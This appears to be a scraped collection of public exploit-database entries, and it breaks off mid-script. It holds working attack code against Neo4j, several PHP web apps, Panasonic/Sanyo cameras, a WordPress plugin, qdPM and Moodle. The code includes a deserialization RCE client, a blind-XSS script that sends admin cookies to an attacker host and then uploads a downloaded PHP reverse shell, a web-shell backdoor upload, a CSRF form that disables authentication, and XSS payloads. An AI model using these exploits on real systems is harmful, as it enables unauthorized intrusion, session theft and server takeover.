ISHACK AI BOT

# Exploit Title: Neo4j 3.4.18 - RMI based Remote Code Execution (RCE) # Date: 7/30/21 # Exploit Author: Christopher Ellis, Nick Gonella, Workday Inc. # Vendor Homepage: neo4j.com # Software Link: https://neo4j.com/download-thanks/?edition=community&release=3.4.18&flavour=unix # Version: 3.4.18 # Tested on: Windows, Mac In older versions of Neo4j, when the shell server is enabled, RCE can be obtained via a Java deserialization exploit. In the ShellServer interface, a method setSessionVariable(Serializable paramSerializable, String paramString, Object paramObject) exists. Neo4j also has a dependency (rhino 1.7.9) with known RCE gadget chains. By crafting an object to abuse these gadget chains, one obtain RCE via the shell server. To create this from scratch using Java, you’ll need to modify the ysoserial library to include the payload found here https://github.com/mozilla/rhino/issues/520 (an update of the existing rhino gadget) as well as modify the ysoserial POM file to include the correct version of rhino. Rebuild ysoserial and include it on your exploit’s classpath. From there, you can use the ShellServer interface and associated code found in neo4j-shell-3.4.18.jar to make your client aware of the server’s method stubs. Now you should be able to call the setSessionVariable method from your exploit/client via RMI. In your exploit, use ysoserial to generate a payload as follows: Object payload = new RhinoGadget().getObject(COMMAND), and then call the setSessionVariable with the payload in the paramObject parameter. The other two parameters can be anything. This will cause the server to deserialize your payload, triggering the gadget chain, and running your command. It is worth noting that we chose to exploit this method and the paramObject parameter as this was the most direct, any method that takes in an Object (other than String or a primitave) is likely vulnerable as well. package runnable; import payloads.RhinoGadget; import sun.rmi.registry.RegistryImpl_Stub; import java.io.Serializable; import java.rmi.Naming; import org.neo4j.shell.ShellServer; public class ExploitB { public static String COMMAND = "touch /tmp/test.txt"; public static String TARGET = "rmi://127.0.0.1:1337"; public static String TARGET_BINDING = "shell"; public static void main (String args[]) throws Exception { boolean validBinding = checkBinding(TARGET_BINDING, TARGET); if (!validBinding) { System.out.println("[-] No valid binding found, shell server may not be listening. Exiting"); System.exit(0); } System.out.println("[+] Found valid binding, proceeding to exploit"); ShellServer server = (ShellServer) Naming.lookup(TARGET + "/" + TARGET_BINDING); Object payload = new RhinoGadget().getObject(COMMAND); //Here server.shutdown may also be callable without auth, just in case the exploit fails and you just want to turn the thing off try { server.setSessionVariable(newClientId(), "anything_here", payload); } catch (Exception UnmarshalException ) { System.out.println("[+] Caught an unmarshalled exception, this is expected."); } System.out.println("[+] Exploit completed"); } /** * Just a helper method to validate that the rmi binding we're looking for is present * @param bindingToCheck the binding you'd like to check for * @param targetToCheck the rmi registry to check against * @return true if the binding is present, false if not */ public static boolean checkBinding(String bindingToCheck, String targetToCheck) { System.out.println("Trying to enumerate server bindings: "); try { RegistryImpl_Stub stub = (RegistryImpl_Stub) Naming.lookup(targetToCheck); for (String element : stub.list()) { System.out.println("Found binding: " + element); if (element.equalsIgnoreCase(bindingToCheck)) return true; } return false; } catch (Exception ex) { return false; } } public static Serializable newClientId() { return Integer.valueOf(1); } }

# Exploit Title: Online Hotel Reservation System 1.0 - 'Multiple' Cross-site scripting (XSS) # Date: 2021-08-02 # Exploit Author: Mohammad Koochaki # Vendor Homepage: https://www.sourcecodester.com/php/13492/online-hotel-reservation-system-phpmysqli.html # Software Link: https://www.sourcecodester.com/sites/default/files/download/oretnom23/marimar.zip # Version: 1.0 # Tested-on: Ubuntu 20.04.2 LTS, PHP 7.4.3 ### This application is prone to a cross-site scripting in the 'arrival' and 'departure' parameters at the following path: - http://localhost/marimar/index.php?p=booking ### Payload: "></div><script>alert("XSS-MSG")</script> ### PoC: POST /marimar/index.php?p=booking HTTP/1.1 Host: localhost User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded Content-Length: 71 Origin: http://localhost Connection: close Referer: http://localhost/marimar/index.php?p=booking Cookie: PHPSESSID=9ck943m19rugu8d7q7d6mh6fnt Upgrade-Insecure-Requests: 1 DNT: 1 Sec-GPC: 1 arrival="></div><script>alert("arrival")</script>&departure="></div><script>alert("departure")</script>&person=0&accomodation=0

# Exploit Title: Hotel Management System 1.0 - Cross-Site Scripting (XSS) Arbitrary File Upload Remote Code Execution (RCE) # Date: 2021-08-01 # Exploit Author: Merbin Russel # Vendor Homepage: https://phpgurukul.com/ # Software Link: https://phpgurukul.com/?smd_process_download=1&download_id=7204 # Version: V1.0 # Tested on: Linux + xampp 7.4.21 ''' What does This Script Do: 1. Send BXSS payload to site 2. Wait until admin fires it 3. Steal admin's session using BXSS script 4. Using Admin's session, upload php shell 5. Make a reverse TCP connection Why does It need BXSS? 1. Site contains file upload feature only in admin's panel. 2. To upload a file we need to know credentials of admin or session 3. BXSS used to steal admin's session to upload php file ''' import socketserver as SocketServer from http.server import BaseHTTPRequestHandler, HTTPServer import sys import requests from time import sleep import _thread as thread import os import multiprocessing try: your_ip = sys.argv[1] your_port = sys.argv[2] site_url = sys.argv[3] except IndexError: print("please run this script as below format \npython3 text.py <attacker_IP> <Attacker_Port> <site's url> ") sys.exit() site_url_xss= site_url + "enquiry.php" os.system('echo "$(tput setaf 6) Trying To inject BXSS Script on site...."') xss_script='[email protected] <script>document.location="http://'+your_ip+':'+your_port+'/?c="+document.cookie;</script>' r = requests.post(site_url_xss, data={'fname':'name', 'email':xss_script,'mobileno':'2154124512','subject':'XSS', 'description':'Blind', 'submit1':' '}) global session session = "" os.system('echo "$(tput setaf 6) BXSS Script has been successfully injected on site...."') os.system('echo "$(tput setaf 6) Waiting for the BXSS payload to be fired..."') def exploit_trigger(): url_payload = site_url+"admin/pacakgeimages/payload.php" r= requests.get(url_payload, allow_redirects=True) def listener(): os_command= "nc -lvp" + str(int(your_port)+1) +"-n" os.system(os_command) def exploit(): p1 = multiprocessing.Process(name='p1', target=listener) p2 = multiprocessing.Process(name='p2', target=exploit_trigger) p1.start() sleep(5) p2.start() def upolad_file(): os.system('echo "$(tput setaf 6) Trying To upload PHP reverse shell...$(tput sgr0)"') global session url = site_url+"admin/create-package.php" cookies = {str(session.split("=",1)[0]): str(session.split("=",1)[1] )} files = {'packagename': (None, 'Helloabcd123'), 'packagetype': (None, 'Helloabcddfff'), 'packagelocation': (None, 'locationing'), 'packageprice': (None, '12345'), 'packagefeatures': (None, 'python_free'), 'packagedetails': (None, 'hello_excuse_me'), 'packageimage': open('payload.php', 'rb'), 'submit': (None, ' '),} r = requests.post(url, files=files, cookies=cookies, verify=False) exploit() def download_payload(): os.system('echo "$(tput setaf 6) BXSS script has been fired..."') os.system('echo "$(tput setaf 6) Downloading PHP reverse shell..."') try: url_payload= "https://raw.githubusercontent.com/pentestmonkey/php-reverse-shell/master/php-reverse-shell.php" r = requests.get(url_payload, allow_redirects=True) except: url_payload= "https://raw.githubusercontent.com/e23e/Testing/master/php-reverse-shell.php" r = requests.get(url_payload, allow_redirects=True) open('payload_temp.php', 'wb').write(r.content) reading_file = open("payload_temp.php", "r") new_file_content = "" for line in reading_file: stripped_line = line.strip() new_line = stripped_line.replace("$ip = '127.0.0.1'; // CHANGE THIS", "$ip = '"+your_ip+"'; // Changed") if stripped_line == "$port = 1234; // CHANGE THIS": new_line = stripped_line.replace("$port = 1234; // CHANGE THIS", "$port = '"+str(int(your_port)+1)+"'; // Changed") new_file_content += new_line +"\n" reading_file.close() writing_file = open("payload.php", "w") writing_file.write(new_file_content) writing_file.close() upolad_file() def kill_me_please(server): server.shutdown() def grep_session(path_info): global session session= path_info.split("/?c=",1)[1] download_payload() class MyHandler(BaseHTTPRequestHandler): global httpd global x x=0 def do_GET(self): global httpd global x if x>=1: return x=x+1 grep_session(self.path) self.send_response(200) thread.start_new_thread(kill_me_please, (httpd,)) httpd = SocketServer.TCPServer(("", 5555), MyHandler) httpd.serve_forever()

# Exploit Title: Panasonic Sanyo CCTV Network Camera 2.03-0x - 'Disable Authentication / Change Password' CSRF # Date: 13.07.2021 # Exploit Author: LiquidWorm # Vendor Homepage: https://www.panasonic.com <!-- Panasonic Sanyo CCTV Network Camera 2.03-0x CSRF Disable Authentication / Change Password Vendor: Panasonic Corporation | SANYO Electric Co., Ltd. Product web page: https://www.panasonic.com https://www.sanyo-av.com https://panasonic.net/sanyo/cs/index.html Affected version: Model: VCC-HD5600P, FrmVer: 2.03-06 (110315-00), SubVer: 1.01-00 (100528-00) Model: VDC-HD3300P, FrmVer: 2.03-08 (111222-00), SubVer: 1.01-00 (100528-00) Model: VDC-HD3300P, FrmVer: 1.02-05 (101005-07), SubVer: 1.01-00 (100528-00) Model: VCC-HD3300, FrmVer: 2.03-02 (110318-00A), SubVer: 1.01-00 (100528-00) Model: VDC-HD3100P, FrmVer: 2.03-00 (110204-02), SubVer: 1.01-00 (100528-00) Model: VCC-HD2100P, FrmVer: 2.03-02 (110318-00A), SubVer: 1.01-00 (100528-00) Summary: SANYO network camera and network optional board with the latest H.264 compression technology provide the optimum surveillance applications with high quality real time moving image at low bandwidth. Simultaneous stream of H.264 and JPEG data and also COAX video out to provide flexible solution for digital and analogue combined system. Desc: The application interface allows users to perform certain actions via HTTP requests without performing any validity checks to verify the requests. These actions can be exploited to perform authentication detriment and account password change with administrative privileges if a logged-in user visits a malicious web site. Tested on: Embedded Linux CGI Vulnerability discovered by Gjoko 'LiquidWorm' Krstic @zeroscience Advisory ID: ZSL-2021-5659 Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2021-5659.php 13.07.2021 --> [CSRF] [Anonymous user log in = ON] orororororororororororororor [Change admin password] <html> <body> <form action="http://10.0.0.3:82/cgi-bin/user_registration.cgi" method="POST"> <input type="hidden" name="anonymous_sw" value="1" /> <!--Disable authentication--> <input type="hidden" name="admin1_pw" value="Ztream0017" /> <!--Change admin password--> <input type="hidden" name="admin2_pw" value="******" /> <input type="hidden" name="admin3_pw" value="******" /> <input type="hidden" name="operator_pw" value="********" /> <input type="hidden" name="guest_pw" value="*****" /> <input type="submit" value="Push" /> </form> </body> </html> <!-- [Defaults] admin:admin admin2:admin2 admin3:admin3 operator:operator operator2:operator2 guest:guest -->

# Exploit Title: WordPress Plugin WP Customize Login 1.1 - 'Change Logo Title' Stored Cross-Site Scripting (XSS) # Date: 2021-08-03 # Exploit Author: Aryan Chehreghani # Software Link: https://wordpress.org/plugins/customize-login/ # Version: 1.1 # Tested on: Windows 10 How to Reproduce this Vulnerability: 1. Install WordPress 5.8 2. Install and activate WP Customize Login 3. Navigate to Customize Login under Settings Tab >> enter the XSS payload into the Change Logo Title input field. 4. Click Save Changes. 5. You will observe that the payload successfully got stored into the database and when you are triggering the same functionality at that time JavaScript payload is executing successfully and we are getting a pop-up. 6. Payload Used: "><script>alert(document.cookie)</script>

# Exploit Title: qdPM 9.1 - Remote Code Execution (RCE) (Authenticated) # Google Dork: intitle:qdPM 9.1. Copyright © 2020 qdpm.net # Date: 2021-08-03 # Original Exploit Author: Rishal Dwivedi (Loginsoft) # Original ExploitDB ID: 47954 # Exploit Author: Leon Trappett (thepcn3rd) # Vendor Homepage: http://qdpm.net/ # Software Link: http://qdpm.net/download-qdpm-free-project-management # Version: <=1.9.1 # Tested on: Ubuntu Server 20.04 (Python 3.9.2) # CVE : CVE-2020-7246 # Exploit written in Python 3.9.2 # Tested Environment - Ubuntu Server 20.04 LTS # Path Traversal + Remote Code Execution #!/usr/bin/python3 import sys import requests from lxml import html from argparse import ArgumentParser session_requests = requests.session() def multifrm(userid, username, csrftoken_, EMAIL, HOSTNAME, uservar): request_1 = { 'sf_method': (None, 'put'), 'users[id]': (None, userid[-1]), 'users[photo_preview]': (None, uservar), 'users[_csrf_token]': (None, csrftoken_[-1]), 'users[name]': (None, username[-1]), 'users[new_password]': (None, ''), 'users[email]': (None, EMAIL), 'extra_fields[9]': (None, ''), 'users[remove_photo]': (None, '1'), } return request_1 def req(userid, username, csrftoken_, EMAIL, HOSTNAME): request_1 = multifrm(userid, username, csrftoken_, EMAIL, HOSTNAME, '.htaccess') new = session_requests.post(HOSTNAME + 'index.php/myAccount/update', files=request_1) request_2 = multifrm(userid, username, csrftoken_, EMAIL, HOSTNAME, '../.htaccess') new1 = session_requests.post(HOSTNAME + 'index.php/myAccount/update', files=request_2) request_3 = { 'sf_method': (None, 'put'), 'users[id]': (None, userid[-1]), 'users[photo_preview]': (None, ''), 'users[_csrf_token]': (None, csrftoken_[-1]), 'users[name]': (None, username[-1]), 'users[new_password]': (None, ''), 'users[email]': (None, EMAIL), 'extra_fields[9]': (None, ''), 'users[photo]': ('backdoor.php', '<?php if(isset($_REQUEST[\'cmd\'])){ echo "<pre>"; $cmd = ($_REQUEST[\'cmd\']); system($cmd); echo "</pre>"; die; }?>' , 'application/octet-stream'), } upload_req = session_requests.post(HOSTNAME + 'index.php/myAccount/update', files=request_3) def main(HOSTNAME, EMAIL, PASSWORD): url = HOSTNAME + '/index.php/login' result = session_requests.get(url) #print(result.text) login_tree = html.fromstring(result.text) authenticity_token = list(set(login_tree.xpath("//input[@name='login[_csrf_token]']/@value")))[0] payload = {'login[email]': EMAIL, 'login[password]': PASSWORD, 'login[_csrf_token]': authenticity_token} result = session_requests.post(HOSTNAME + '/index.php/login', data=payload, headers=dict(referer=HOSTNAME + '/index.php/login')) # The designated admin account does not have a myAccount page account_page = session_requests.get(HOSTNAME + 'index.php/myAccount') account_tree = html.fromstring(account_page.content) userid = account_tree.xpath("//input[@name='users[id]']/@value") username = account_tree.xpath("//input[@name='users[name]']/@value") csrftoken_ = account_tree.xpath("//input[@name='users[_csrf_token]']/@value") req(userid, username, csrftoken_, EMAIL, HOSTNAME) get_file = session_requests.get(HOSTNAME + 'index.php/myAccount') final_tree = html.fromstring(get_file.content) backdoor = final_tree.xpath("//input[@name='users[photo_preview]']/@value") print('Backdoor uploaded at - > ' + HOSTNAME + '/uploads/users/' + backdoor[-1] + '?cmd=whoami') if __name__ == '__main__': print("You are not able to use the designated admin account because they do not have a myAccount page.\n") parser = ArgumentParser(description='qdmp - Path traversal + RCE Exploit') parser.add_argument('-url', '--host', dest='hostname', help='Project URL') parser.add_argument('-u', '--email', dest='email', help='User email (Any privilege account)') parser.add_argument('-p', '--password', dest='password', help='User password') args = parser.parse_args() # Added detection if the arguments are passed and populated, if not display the arguments if (len(sys.argv) > 1 and isinstance(args.hostname, str) and isinstance(args.email, str) and isinstance(args.password, str)): main(args.hostname, args.email, args.password) else: parser.print_help()

# Exploit Title: qdPM 9.2 - DB Connection String and Password Exposure (Unauthenticated) # Date: 03/08/2021 # Exploit Author: Leon Trappett (thepcn3rd) # Vendor Homepage: https://qdpm.net/ # Software Link: https://sourceforge.net/projects/qdpm/files/latest/download # Version: 9.2 # Tested on: Ubuntu 20.04 Apache2 Server running PHP 7.4 The password and connection string for the database are stored in a yml file. To access the yml file you can go to http://<website>/core/config/databases.yml file and download.

# Exploit Title: Client Management System 1.1 - 'cname' Stored Cross-site scripting (XSS) # Date: 2021-08-04 # Exploit Author: Mohammad Koochaki # Vendor Homepage: https://phpgurukul.com/client-management-system-using-php-mysql/ # Software Link: https://phpgurukul.com/?smd_process_download=1&download_id=10841 # Version: 1.1 # Tested on: Ubuntu 20.04.2 LTS, PHP 7.4.3 ### This application is prone to a cross-site scripting in the 'searchdata' parameter at the following path: - Reflected: http://localhost/admin/search-invoices.php - Reflected: http://localhost/client/search-invoices.php - Stored: http://localhost/client/client-profile.php ### Payloads: - Reflected: </h4><script>alert(document.cookie)</script> - Stored: "><script>alert(document.cookie)</script>Anuj+Kumar ### PoC: ## Reflected: POST /admin/search-invoices.php HTTP/1.1 Host: localhost User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded Content-Length: 77 Origin: http://localhost Connection: close Referer: http://localhost/admin/search-invoices.php Cookie: PHPSESSID=o5thu5n92ac58evl71eou90krs Upgrade-Insecure-Requests: 1 DNT: 1 Sec-GPC: 1 searchdata=</h4><script>alert(document.cookie)</script>&search= ## Stored: POST /client/client-profile.php HTTP/1.1 Host: localhost User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded Content-Length: 335 Origin: http://localhost Connection: close Referer: http://localhost/client/client-profile.php Cookie: PHPSESSID=o5thu5n92ac58evl71eou90krs Upgrade-Insecure-Requests: 1 DNT: 1 Sec-GPC: 1 cname="><script>alert(document.cookie)</script>Anuj+Kumar&comname=PHPGurukul+Programming+Blog&address=New+Delhi&city=New+Delhi&state=Delhi&zcode=110001&wphnumber=9354778033&cellphnumber=9354778033&ophnumber=9354778033&email=phpgurukulofficial% 40gmail.com&websiteadd=https%3A%2F%2Fphpgurukul.com&notes=New+User&submit=

# Exploit Title: Moodle 3.9 - Remote Code Execution (RCE) (Authenticated) # Date: 12-05-2021 # Exploit Author: lanz # Vendor Homepage: https://moodle.org/ # Version: Moodle 3.9 # Tested on: FreeBSD #!/usr/bin/python3 ## Moodle 3.9 - RCE (Authenticated as teacher) ## Based on PoC and Payload to assign full permissions to manager rol: ## * https://github.com/HoangKien1020/CVE-2020-14321 ## Repository: https://github.com/lanzt/CVE-2020-14321/blob/main/CVE-2020-14321_RCE.py import string, random import requests, re import argparse import base64 import signal import time from pwn import * class Color: BLUE = '\033[94m' GREEN = '\033[92m' YELLOW = '\033[93m' RED = '\033[91m' END = '\033[0m' def def_handler(sig, frame): print(Color.RED + "\n[!] 3xIt1ngG...\n") exit(1) signal.signal(signal.SIGINT, def_handler) banner = base64.b64decode("IF9fICAgICBfXyAgICAgX18gICBfXyAgX18gICBfXyAgICAgICAgICAgICAgX18gIF9fICAgICAKLyAgXCAgL3xfICBfXyAgIF8pIC8gIFwgIF8pIC8gIFwgX18gIC98IHxfX3wgIF8pICBfKSAvfCAKXF9fIFwvIHxfXyAgICAgL19fIFxfXy8gL19fIFxfXy8gICAgICB8ICAgIHwgX18pIC9fXyAgfCDigKIgYnkgbGFuegoKTW9vZGxlIDMuOSAtIFJlbW90ZSBDb21tYW5kIEV4ZWN1dGlvbiAoQXV0aGVudGljYXRlZCBhcyB0ZWFjaGVyKQpDb3Vyc2UgZW5yb2xtZW50cyBhbGxvd2VkIHByaXZpbGVnZSBlc2NhbGF0aW9uIGZyb20gdGVhY2hlciByb2xlIGludG8gbWFuYWdlciByb2xlIHRvIFJDRQogICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIA==").decode() print(Color.BLUE + banner + Color.END) def usagemybro(): fNombre = os.path.basename(__file__) ussage = fNombre + ' [-h] [-u USERNAME] [-p PASSWORD] [-idm ID_MANAGER] [-idc ID_COURSE] [-c COMMAND] [--cookie TEACHER_COOKIE] url\n\n' ussage += '[+] Examples:\n' ussage += '\t' + fNombre + ' http://moodle.site.com/moodle -u teacher_name -p teacher_pass\n' ussage += '\t' + fNombre + " http://moodle.site.com/moodle --cookie thisistheffcookieofmyteaaacher\n" return ussage def arguments(): parse = argparse.ArgumentParser(usage=usagemybro()) parse.add_argument(dest='url', type=str, help='URL Moodle site') parse.add_argument('-u', dest='username', type=str, default='lanz', help='Teacher username, default: lanz') parse.add_argument('-p', dest='password', type=str, default='Lanz123$!', help='Teacher password, default: Lanz123$!') parse.add_argument('-idm', dest='id_manager', type=str, default='25', help='Manager user ID, default: 25') parse.add_argument('-idc', dest='id_course', type=str, default='5', help='Course ID valid to enrol yourself, default: 5') parse.add_argument('-c', dest='command', type=str, default='whoami', help='Command to execute, default: whoami') parse.add_argument('--cookie', dest='teacher_cookie', type=str, default='', help='Teacher cookie (if you don\'t have valid credentials)') return parse.parse_args() def login(url, username, password, course_id, teacher_cookie): ''' Sign in on site, with creds or with cookie ''' p1 = log.progress("Login on site") session = requests.Session() r = session.get(url + '/login/index.php') # Sign in with teacher cookie if teacher_cookie != "": p1.status("Cookie " + Color.BLUE + "MoodleSession:" + teacher_cookie + Color.END) time.sleep(2) # In case the URL format is: http://moodle.site.com/moodle cookie_domain = url.split('/')[2] # moodle.site.com cookie_path = "/%s/" % (url.split('/')[3]) # /moodle/ session.cookies.set('MoodleSession', teacher_cookie, domain=cookie_domain, path=cookie_path) r = session.get(url + '/user/index.php', params={"id":course_id}) try: re.findall(r'class="usertext mr-1">(.*?)<', r.text)[0] except IndexError: p1.failure(Color.RED + "✘" + Color.END) print(Color.RED + "\nInvalid cookie, try again, verify cookie domain and cookie path or simply change all.\n") exit(1) id_user = re.findall(r'id="nav-notification-popover-container" data-userid="(.*?)"', r.text)[0] sess_key = re.findall(r'"sesskey":"(.*?)"', r.text)[0] p1.success(Color.BLUE + "MoodleSession:" + teacher_cookie + Color.END + Color.YELLOW + " ✓" + Color.END) time.sleep(1) # Sign in with teacher credentials elif username and password != "": p1.status("Creds " + Color.BLUE + username + ":" + password + Color.END) time.sleep(2) login_token = re.findall(r'name="logintoken" value="(.*?)"', r.text)[0] data_post = { "anchor" : "", "logintoken" : login_token, "username" : username, "password" : password } r = session.post(url + '/login/index.php', data=data_post) if "Recently accessed courses" not in r.text: p1.failure(Color.RED + "✘" + Color.END) print(Color.RED + "\nInvalid credentials.\n") exit(1) id_user = re.findall(r'id="nav-notification-popover-container" data-userid="(.*?)"', r.text)[0] sess_key = re.findall(r'"sesskey":"(.*?)"', r.text)[0] p1.success(Color.BLUE + username + ":" + password + Color.END + Color.YELLOW + " ✓" + Color.END) time.sleep(1) else: print(Color.RED + "\nUse valid credentials or valid cookie\n") exit(1) return session, id_user, sess_key def enrol2rce(session, url, id_manager, username, course_id, teacher_cookie, command): ''' Assign rol manager to teacher and manager account in the course. ''' p4 = log.progress("Updating roles to move on manager accout") time.sleep(1) r = session.get(url + '/user/index.php', params={"id":course_id}) try: teacher_user = re.findall(r'class="usertext mr-1">(.*?)<', r.text)[0] except IndexError: p4.failure(Color.RED + "✘" + Color.END) print(Color.RED + "\nInvalid cookie, try again, verify cookie domain and cookie path or simply change all.\n") exit(1) p4.status("Teacher " + Color.BLUE + teacher_user + Color.END) time.sleep(1) id_user = re.findall(r'id="nav-notification-popover-container" data-userid="(.*?)"', r.text)[0] sess_key = re.findall(r'"sesskey":"(.*?)"', r.text)[0] session = update_rol(session, url, sess_key, course_id, id_user) session = update_rol(session, url, sess_key, course_id, id_manager) data_get = { "id" : course_id, "user" : id_manager, "sesskey" : sess_key } r = session.get(url + '/course/loginas.php', params=data_get) if "You are logged in as" not in r.text: p4.failure(Color.RED + "✘" + Color.END) print(Color.RED + "\nError trying to move on manager account. Validate credentials (or cookie).\n") exit(1) p4.success(Color.YELLOW + "✓" + Color.END) time.sleep(1) sess_key = re.findall(r'"sesskey":"(.*?)"', r.text)[0] # Updating rol manager to enable install plugins session, sess_key = update_rol_manager(session, url, sess_key) # Upload malicious zip file zipb64_up(session, url, sess_key, teacher_user, course_id) # RCE on system moodle_RCE(url, command) def update_rol(session, url, sess_key, course_id, id_user): ''' Updating teacher rol to enable he update other users ''' data_get = { "mform_showmore_main" : "0", "id" : course_id, "action" : "enrol", "enrolid" : "10", "sesskey" : sess_key, "_qf__enrol_manual_enrol_users_form" : "1", "mform_showmore_id_main" : "0", "userlist[]" : id_user, "roletoassign" : "1", "startdate" : "4", "duration" : "" } r = session.get(url + '/enrol/manual/ajax.php', params=data_get) return session def update_rol_manager(session, url, sess_key): ''' Updating rol manager to enable install plugins * Extracted from: https://github.com/HoangKien1020/CVE-2020-14321 ''' p6 = log.progress("Updating rol manager to enable install plugins") time.sleep(1) data_get = { "action":"edit", "roleid":"1" } random_desc = ''.join(random.choice(string.ascii_lowercase) for i in range(15)) # Headache part :P data_post = [('sesskey',sess_key),('return','manage'),('resettype','none'),('shortname','manager'),('name',''),('description',random_desc),('archetype','manager'),('contextlevel10','0'),('contextlevel10','1'),('contextlevel30','0'),('contextlevel30','1'),('contextlevel40','0'),('contextlevel40','1'),('contextlevel50','0'),('contextlevel50','1'),('contextlevel70','0'),('contextlevel70','1'),('contextlevel80','0'),('contextlevel80','1'),('allowassign[]',''),('allowassign[]','1'),('allowassign[]','2'),('allowassign[]','3'),('allowassign[]','4'),('allowassign[]','5'),('allowassign[]','6'),('allowassign[]','7'),('allowassign[]','8'),('allowoverride[]',''),('allowoverride[]','1'),('allowoverride[]','2'),('allowoverride[]','3'),('allowoverride[]','4'),('allowoverride[]','5'),('allowoverride[]','6'),('allowoverride[]','7'),('allowoverride[]','8'),('allowswitch[]',''),('allowswitch[]','1'),('allowswitch[]','2'),('allowswitch[]','3'),('allowswitch[]','4'),('allowswitch[]','5'),('allowswitch[]','6'),('allowswitch[]','7'),('allowswitch[]','8'),('allowview[]',''),('allowview[]','1'),('allowview[]','2'),('allowview[]','3'),('allowview[]','4'),('allowview[]','5'),('allowview[]','6'),('allowview[]','7'),('allowview[]','8'),('block/admin_bookmarks:myaddinstance','1'),('block/badges:myaddinstance','1'),('block/calendar_month:myaddinstance','1'),('block/calendar_upcoming:myaddinstance','1'),('block/comments:myaddinstance','1'),('block/course_list:myaddinstance','1'),('block/globalsearch:myaddinstance','1'),('block/glossary_random:myaddinstance','1'),('block/html:myaddinstance','1'),('block/lp:addinstance','1'),('block/lp:myaddinstance','1'),('block/mentees:myaddinstance','1'),('block/mnet_hosts:myaddinstance','1'),('block/myoverview:myaddinstance','1'),('block/myprofile:myaddinstance','1'),('block/navigation:myaddinstance','1'),('block/news_items:myaddinstance','1'),('block/online_users:myaddinstance','1'),('block/private_files:myaddinstance','1'),('block/recentlyaccessedcourses:myaddinstance','1'),('block/recentlyaccesseditems:myaddinstance','1'),('block/rss_client:myaddinstance','1'),('block/settings:myaddinstance','1'),('block/starredcourses:myaddinstance','1'),('block/tags:myaddinstance','1'),('block/timeline:myaddinstance','1'),('enrol/category:synchronised','1'),('message/airnotifier:managedevice','1'),('moodle/analytics:listowninsights','1'),('moodle/analytics:managemodels','1'),('moodle/badges:manageglobalsettings','1'),('moodle/blog:create','1'),('moodle/blog:manageentries','1'),('moodle/blog:manageexternal','1'),('moodle/blog:search','1'),('moodle/blog:view','1'),('moodle/blog:viewdrafts','1'),('moodle/course:configurecustomfields','1'),('moodle/course:recommendactivity','1'),('moodle/grade:managesharedforms','1'),('moodle/grade:sharegradingforms','1'),('moodle/my:configsyspages','1'),('moodle/my:manageblocks','1'),('moodle/portfolio:export','1'),('moodle/question:config','1'),('moodle/restore:createuser','1'),('moodle/role:manage','1'),('moodle/search:query','1'),('moodle/site:config','1'),('moodle/site:configview','1'),('moodle/site:deleteanymessage','1'),('moodle/site:deleteownmessage','1'),('moodle/site:doclinks','1'),('moodle/site:forcelanguage','1'),('moodle/site:maintenanceaccess','1'),('moodle/site:manageallmessaging','1'),('moodle/site:messageanyuser','1'),('moodle/site:mnetlogintoremote','1'),('moodle/site:readallmessages','1'),('moodle/site:sendmessage','1'),('moodle/site:uploadusers','1'),('moodle/site:viewparticipants','1'),('moodle/tag:edit','1'),('moodle/tag:editblocks','1'),('moodle/tag:flag','1'),('moodle/tag:manage','1'),('moodle/user:changeownpassword','1'),('moodle/user:create','1'),('moodle/user:delete','1'),('moodle/user:editownmessageprofile','1'),('moodle/user:editownprofile','1'),('moodle/user:ignoreuserquota','1'),('moodle/user:manageownblocks','1'),('moodle/user:manageownfiles','1'),('moodle/user:managesyspages','1'),('moodle/user:update','1'),('moodle/webservice:createmobiletoken','1'),('moodle/webservice:createtoken','1'),('moodle/webservice:managealltokens','1'),('quizaccess/seb:managetemplates','1'),('report/courseoverview:view','1'),('report/performance:view','1'),('report/questioninstances:view','1'),('report/security:view','1'),('report/status:view','1'),('tool/customlang:edit','1'),('tool/customlang:view','1'),('tool/dataprivacy:managedataregistry','1'),('tool/dataprivacy:managedatarequests','1'),('tool/dataprivacy:requestdeleteforotheruser','1'),('tool/lpmigrate:frameworksmigrate','1'),('tool/monitor:managetool','1'),('tool/policy:accept','1'),('tool/policy:managedocs','1'),('tool/policy:viewacceptances','1'),('tool/uploaduser:uploaduserpictures','1'),('tool/usertours:managetours','1'),('auth/oauth2:managelinkedlogins','1'),('moodle/badges:manageownbadges','1'),('moodle/badges:viewotherbadges','1'),('moodle/competency:evidencedelete','1'),('moodle/competency:plancomment','1'),('moodle/competency:plancommentown','1'),('moodle/competency:planmanage','1'),('moodle/competency:planmanagedraft','1'),('moodle/competency:planmanageown','1'),('moodle/competency:planmanageowndraft','1'),('moodle/competency:planrequestreview','1'),('moodle/competency:planrequestreviewown','1'),('moodle/competency:planreview','1'),('moodle/competency:planview','1'),('moodle/competency:planviewdraft','1'),('moodle/competency:planviewown','1'),('moodle/competency:planviewowndraft','1'),('moodle/competency:usercompetencycomment','1'),('moodle/competency:usercompetencycommentown','1'),('moodle/competency:usercompetencyrequestreview','1'),('moodle/competency:usercompetencyrequestreviewown','1'),('moodle/competency:usercompetencyreview','1'),('moodle/competency:usercompetencyview','1'),('moodle/competency:userevidencemanage','1'),('moodle/competency:userevidencemanageown','0'),('moodle/competency:userevidenceview','1'),('moodle/user:editmessageprofile','1'),('moodle/user:editprofile','1'),('moodle/user:manageblocks','1'),('moodle/user:readuserblogs','1'),('moodle/user:readuserposts','1'),('moodle/user:viewalldetails','1'),('moodle/user:viewlastip','1'),('moodle/user:viewuseractivitiesreport','1'),('report/usersessions:manageownsessions','1'),('tool/dataprivacy:downloadallrequests','1'),('tool/dataprivacy:downloadownrequest','1'),('tool/dataprivacy:makedatadeletionrequestsforchildren','1'),(